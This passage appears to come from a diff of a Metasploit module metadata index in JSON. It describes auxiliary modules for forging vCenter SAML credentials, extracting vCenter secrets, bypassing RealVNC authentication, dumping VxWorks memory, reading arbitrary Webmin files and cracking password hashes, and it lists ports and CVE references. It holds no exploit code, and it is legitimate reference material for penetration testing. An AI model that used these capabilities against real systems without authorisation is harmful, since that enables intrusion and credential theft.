It does this by\n logging a user event with user supplied text", - "references": [], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/vmware/tag_vm.rb", - "is_install_path": true, - "ref_name": "admin/vmware/tag_vm", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vmware/terminate_esx_sessions": { - "name": "VMWare Terminate ESX Login Sessions", - "fullname": "auxiliary/admin/vmware/terminate_esx_sessions", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine " - ], - "description": "This module will log into the Web API of VMWare and try to terminate\n user login sessions as specified by the session keys.", - "references": [], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb", - "is_install_path": true, - "ref_name": "admin/vmware/terminate_esx_sessions", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vmware/vcenter_forge_saml_token": { - "name": "VMware vCenter Forge SAML Authentication Credentials", - "fullname": "auxiliary/admin/vmware/vcenter_forge_saml_token", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-04-20", - "type": "auxiliary", - "author": [ - "npm " - ], - "description": "This module forges valid SAML 
credentials for vCenter server\n using the vCenter SSO IdP certificate, IdP private key, and\n VMCA certificates as input objects; you must also provide\n the vCenter SSO domain name and vCenter FQDN. The module will\n return a session cookie for the /ui path that grants access to\n the SSO domain as a vSphere administrator. The IdP trusted\n certificate chain can be retrieved using Metasploit post\n exploitation modules or extracted manually from\n /storage/db/vmware-vmdir/data.mdb using binwalk.", - "references": [ - "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/" - ], - "platform": "Linux", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-03 19:50:04 +0000", - "path": "/modules/auxiliary/admin/vmware/vcenter_forge_saml_token.rb", - "is_install_path": true, - "ref_name": "admin/vmware/vcenter_forge_saml_token", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Run", - "description": "Generate vSphere session cookie" - } - ] - }, - "auxiliary_admin/vmware/vcenter_offline_mdb_extract": { - "name": "VMware vCenter Extract Secrets from vmdir / vmafd DB File", - "fullname": "auxiliary/admin/vmware/vcenter_offline_mdb_extract", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-05-10", - "type": "auxiliary", - "author": [ - "npm " - ], - "description": "Grab certificates from the vCenter server vmdird and vmafd\n database files and adds them to loot. 
The vmdird MDB database file\n can be found on the live appliance under the path\n /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path\n /storage/db/vmware-vmafd/afd.db. The vmdir database contains the\n IdP signing credential, and vmafd contains the vCenter certificate\n store. This module will accept either file from a live vCenter\n appliance, or from a vCenter appliance backup archive; either or\n both files can be supplied.", - "references": [ - "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/" - ], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-05-26 11:52:56 +0000", - "path": "/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.rb", - "is_install_path": true, - "ref_name": "admin/vmware/vcenter_offline_mdb_extract", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Dump", - "description": "Dump secrets from vCenter files" - } - ] - }, - "auxiliary_admin/vnc/realvnc_41_bypass": { - "name": "RealVNC NULL Authentication Mode Bypass", - "fullname": "auxiliary/admin/vnc/realvnc_41_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-05-15", - "type": "auxiliary", - "author": [ - "hdm ", - "theLightCosine " - ], - "description": "This module exploits an Authentication bypass Vulnerability\n in RealVNC Server version 4.1.0 and 4.1.1. 
It sets up a proxy\n listener on LPORT and proxies to the target server\n\n The AUTOVNC option requires that vncviewer be installed on\n the attacking machine.", - "references": [ - "BID-17978", - "OSVDB-25479", - "URL-https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/", - "CVE-2006-2369" - ], - "platform": "", - "arch": "", - "rport": 5900, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb", - "is_install_path": true, - "ref_name": "admin/vnc/realvnc_41_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vxworks/apple_airport_extreme_password": { - "name": "Apple Airport Extreme Password Extraction (WDBRPC)", - "fullname": "auxiliary/admin/vxworks/apple_airport_extreme_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module can be used to read the stored password of a vulnerable\n Apple Airport Extreme access point. Only a small number of firmware versions\n have the WDBRPC service running, however the factory configuration was\n vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are\n susceptible to this issue. 
Once the password is obtained, the access point\n can be managed using the Apple AirPort utility.", - "references": [ - "OSVDB-66842", - "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", - "US-CERT-VU-362332" - ], - "platform": "", - "arch": "", - "rport": 17185, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb", - "is_install_path": true, - "ref_name": "admin/vxworks/apple_airport_extreme_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vxworks/dlink_i2eye_autoanswer": { - "name": "D-Link i2eye Video Conference AutoAnswer (WDBRPC)", - "fullname": "auxiliary/admin/vxworks/dlink_i2eye_autoanswer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module can be used to enable auto-answer mode for the D-Link\n i2eye video conferencing system. Once this setting has been flipped,\n the device will accept incoming video calls without acknowledgement.\n The NetMeeting software included in Windows XP can be used to connect\n to this device. 
The i2eye product is no longer supported by the vendor\n and all models have reached their end of life (EOL).", - "references": [ - "OSVDB-66842", - "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", - "US-CERT-VU-362332" - ], - "platform": "", - "arch": "", - "rport": 17185, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb", - "is_install_path": true, - "ref_name": "admin/vxworks/dlink_i2eye_autoanswer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/vxworks/wdbrpc_memory_dump": { - "name": "VxWorks WDB Agent Remote Memory Dump", - "fullname": "auxiliary/admin/vxworks/wdbrpc_memory_dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module provides the ability to dump the system memory of a VxWorks target through WDBRPC", - "references": [ - "OSVDB-66842", - "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", - "US-CERT-VU-362332" - ], - "platform": "", - "arch": "", - "rport": 17185, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb", - "is_install_path": true, - "ref_name": "admin/vxworks/wdbrpc_memory_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Dump system memory" - } - ] - }, - "auxiliary_admin/vxworks/wdbrpc_reboot": { - "name": "VxWorks WDB Agent Remote Reboot", - "fullname": 
"auxiliary/admin/vxworks/wdbrpc_reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module provides the ability to reboot a VxWorks target through WDBRPC", - "references": [ - "OSVDB-66842", - "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", - "US-CERT-VU-362332" - ], - "platform": "", - "arch": "", - "rport": 17185, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb", - "is_install_path": true, - "ref_name": "admin/vxworks/wdbrpc_reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Reboot", - "description": "Reboot target" - } - ] - }, - "auxiliary_admin/webmin/edit_html_fileaccess": { - "name": "Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access", - "fullname": "auxiliary/admin/webmin/edit_html_fileaccess", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-09-06", - "type": "auxiliary", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a directory traversal in Webmin 1.580. The vulnerability\n exists in the edit_html.cgi component and allows an authenticated user with access\n to the File Manager Module to access arbitrary files with root privileges. 
The\n module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.", - "references": [ - "OSVDB-85247", - "BID-55446", - "CVE-2012-2983", - "URL-http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf", - "URL-https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80" - ], - "platform": "", - "arch": "", - "rport": 10000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb", - "is_install_path": true, - "ref_name": "admin/webmin/edit_html_fileaccess", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/webmin/file_disclosure": { - "name": "Webmin File Disclosure", - "fullname": "auxiliary/admin/webmin/file_disclosure", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-06-30", - "type": "auxiliary", - "author": [ - "Matteo Cantoni " - ], - "description": "A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. 
This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).", - "references": [ - "OSVDB-26772", - "BID-18744", - "CVE-2006-3392", - "US-CERT-VU-999601", - "URL-https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/" - ], - "platform": "", - "arch": "", - "rport": 10000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/webmin/file_disclosure.rb", - "is_install_path": true, - "ref_name": "admin/webmin/file_disclosure", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/wemo/crockpot": { - "name": "Belkin Wemo-Enabled Crock-Pot Remote Control", - "fullname": "auxiliary/admin/wemo/crockpot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "wvu " - ], - "description": "This module acts as a simple remote control for Belkin Wemo-enabled\n Crock-Pots by implementing a subset of the functionality provided by the\n Wemo App.\n\n No vulnerabilities are exploited by this Metasploit module in any way.", - "references": [ - "URL-http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html", - "URL-https://www.belkin.com/us/support-article?articleNum=101177", - "URL-http://www.wemo.com/" - ], - "platform": "", - "arch": "", - "rport": 49152, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - 
"targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/wemo/crockpot.rb", - "is_install_path": true, - "ref_name": "admin/wemo/crockpot", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Cook", - "description": "Cook stuff" - }, - { - "name": "Stop", - "description": "Stop cooking" - } - ] - }, - "auxiliary_admin/zend/java_bridge": { - "name": "Zend Server Java Bridge Design Flaw Remote Code Execution", - "fullname": "auxiliary/admin/zend/java_bridge", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-28", - "type": "auxiliary", - "author": [ - "ikki", - "MC " - ], - "description": "This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.", - "references": [ - "OSVDB-71420", - "ZDI-11-113", - "EDB-17078" - ], - "platform": "", - "arch": "", - "rport": 10001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/zend/java_bridge.rb", - "is_install_path": true, - "ref_name": "admin/zend/java_bridge", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_analyze/apply_pot": { - "name": "Apply Pot File To Hashes", - "fullname": "auxiliary/analyze/apply_pot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database 
instantly. JtR's --show functionality is used to\n help combine all the passwords into an easy to use format.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/apply_pot.rb", - "is_install_path": true, - "ref_name": "analyze/apply_pot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_aix": { - "name": "Password Cracker: AIX", - "fullname": "auxiliary/analyze/crack_aix", - "aliases": [ - "auxiliary/analyze/jtr_aix" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine ", - "hdm ", - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from passwd files on AIX systems. 
These utilize DES hashing.\n DES is format 1500 in Hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_aix.rb", - "is_install_path": true, - "ref_name": "analyze/crack_aix", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_databases": { - "name": "Password Cracker: Databases", - "fullname": "auxiliary/analyze/crack_databases", - "aliases": [ - "auxiliary/analyze/jtr_mssql_fast", - "auxiliary/analyze/jtr_mysql_fast", - "auxiliary/analyze/jtr_oracle_fast", - "auxiliary/analyze/jtr_postgres_fast" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine ", - "hdm ", - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from the mssql_hashdump, mysql_hashdump, postgres_hashdump, or oracle_hashdump modules.\n Passwords that have been successfully cracked are then saved as proper credentials.\n Due to the complexity of some of the hash types, they can be very slow. 
Setting the\n ITERATION_TIMEOUT is highly recommended.\n MSSQL is 131, 132, and 1731 in hashcat.\n MYSQL is 200, and 300 in hashcat.\n ORACLE is 112, and 12300 in hashcat.\n POSTGRES is 12 in hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_databases.rb", - "is_install_path": true, - "ref_name": "analyze/crack_databases", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_linux": { - "name": "Password Cracker: Linux", - "fullname": "auxiliary/analyze/crack_linux", - "aliases": [ - "auxiliary/analyze/jtr_linux" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine ", - "hdm ", - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from unshadowed passwd files from Unix/Linux systems. The module will only crack\n MD5, BSDi and DES implementations by default. 
However, it can also crack\n Blowfish and SHA(256/512), but it is much slower.\n MD5 is format 500 in hashcat.\n DES is format 1500 in hashcat.\n BSDI is format 12400 in hashcat.\n BLOWFISH is format 3200 in hashcat.\n SHA256 is format 7400 in hashcat.\n SHA512 is format 1800 in hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_linux.rb", - "is_install_path": true, - "ref_name": "analyze/crack_linux", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_mobile": { - "name": "Password Cracker: Mobile", - "fullname": "auxiliary/analyze/crack_mobile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module uses Hashcat to identify weak passwords that have been\n acquired from Android systems. These utilize MD5 or SHA1 hashing.\n Android (Samsung) SHA1 is format 5800 in Hashcat. Android\n (non-Samsung) SHA1 is format 110 in Hashcat. 
Android MD5 is format 10.\n JTR does not support Android hashes at the time of writing.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_mobile.rb", - "is_install_path": true, - "ref_name": "analyze/crack_mobile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - } - ] - }, - "auxiliary_analyze/crack_osx": { - "name": "Password Cracker: OSX", - "fullname": "auxiliary/analyze/crack_osx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from OSX systems. 
The module will only crack xsha from OSX 10.4-10.6, xsha512\n from 10.7, and PBKDF2 from OSX 10.8+.\n XSHA is 122 in hashcat.\n XSHA512 is 1722 in hashcat.\n PBKDF2 (PBKDF2-HMAC-SHA512) is 7100 in hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_osx.rb", - "is_install_path": true, - "ref_name": "analyze/crack_osx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_webapps": { - "name": "Password Cracker: Webapps", - "fullname": "auxiliary/analyze/crack_webapps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from various web applications.\n Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n PHPass uses phpass which is 400 in hashcat.\n Mediawiki is MD5 based and is 3711 in hashcat.\n Apache Superset, some Flask and Werkzeug apps is pbkdf2-sha256 and is 10900 in hashcat", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_webapps.rb", - "is_install_path": true, - "ref_name": "analyze/crack_webapps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - 
"session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/crack_windows": { - "name": "Password Cracker: Windows", - "fullname": "auxiliary/analyze/crack_windows", - "aliases": [ - "auxiliary/analyze/jtr_windows_fast" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "theLightCosine ", - "hdm ", - "h00die" - ], - "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from Windows systems.\n LANMAN is format 3000 in hashcat.\n NTLM is format 1000 in hashcat.\n MSCASH is format 1100 in hashcat.\n MSCASH2 is format 2100 in hashcat.\n NetNTLM is format 5500 in hashcat.\n NetNTLMv2 is format 5600 in hashcat.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/crack_windows.rb", - "is_install_path": true, - "ref_name": "analyze/crack_windows", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "hashcat", - "description": "Use Hashcat" - }, - { - "name": "john", - "description": "Use John the Ripper" - } - ] - }, - "auxiliary_analyze/modbus_zip": { - "name": "Extract zip from Modbus communication", - "fullname": "auxiliary/analyze/modbus_zip", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "José Diogo Monteiro ", - "Luis Rosa " - ], - "description": "This module is able to extract a zip file sent through Modbus from a pcap.\n Tested with Schneider TM221CE16R.", - "references": [], - "platform": "", - 
"arch": "", - "rport": 502, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-07 21:38:27 +0000", - "path": "/modules/auxiliary/analyze/modbus_zip.rb", - "is_install_path": true, - "ref_name": "analyze/modbus_zip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_bnat/bnat_router": { - "name": "BNAT Router", - "fullname": "auxiliary/bnat/bnat_router", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "bannedit ", - "Jonathan Claudius" - ], - "description": "This module will properly route BNAT traffic and allow for connections to be\n established to machines on ports which might not otherwise be accessible.", - "references": [ - "URL-https://github.com/claudijd/bnat", - "URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 12:09:08 +0000", - "path": "/modules/auxiliary/bnat/bnat_router.rb", - "is_install_path": true, - "ref_name": "bnat/bnat_router", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_bnat/bnat_scan": { - "name": "BNAT Scanner", - "fullname": "auxiliary/bnat/bnat_scan", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "bannedit ", - "Jonathan Claudius " - ], - "description": "This module is a scanner which can detect Broken NAT (network address translation)\n implementations, which could result in an inability to reach ports on remote\n machines. 
Typically, these ports will appear in nmap scans as 'filtered'/'closed'.", - "references": [ - "URL-https://github.com/claudijd/bnat", - "URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 12:09:08 +0000", - "path": "/modules/auxiliary/bnat/bnat_scan.rb", - "is_install_path": true, - "ref_name": "bnat/bnat_scan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/hwbridge/connect": { - "name": "Hardware Bridge Session Connector", - "fullname": "auxiliary/client/hwbridge/connect", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Craig Smith" - ], - "description": "The Hardware Bridge (HWBridge) is a standardized method for\n Metasploit to interact with Hardware Devices. This extends\n the normal exploit capabilities to the non-ethernet realm and\n enables direct hardware and alternative bus manipulations. You\n must have compatible bridging hardware attached to this machine or\n reachable on your network to use any HWBridge exploits.\n\n Use this exploit module to connect the physical HWBridge which\n will start an interactive hwbridge session. You can launch a hwbridge\n server locally by using compliant hardware and executing the local_hwbridge\n module. 
After that module has started, pass the HWBRIDGE_BASE_URL\n options to this connector module.", - "references": [ - "URL-https://web.archive.org/web/20170206145056/http://opengarages.org/hwbridge/" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/hwbridge/connect.rb", - "is_install_path": true, - "ref_name": "client/hwbridge/connect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_client/iec104/iec104": { - "name": "IEC104 Client Utility", - "fullname": "auxiliary/client/iec104/iec104", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Michael John " - ], - "description": "This module allows sending 104 commands.", - "references": [], - "platform": "", - "arch": "", - "rport": 2404, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-05-04 23:26:52 +0000", - "path": "/modules/auxiliary/client/iec104/iec104.rb", - "is_install_path": true, - "ref_name": "client/iec104/iec104", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "SEND_COMMAND", - "description": "Send command to device" - } - ] - }, - "auxiliary_client/mms/send_mms": { - "name": "MMS Client", - "fullname": "auxiliary/client/mms/send_mms", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sinn3r " - ], - "description": 
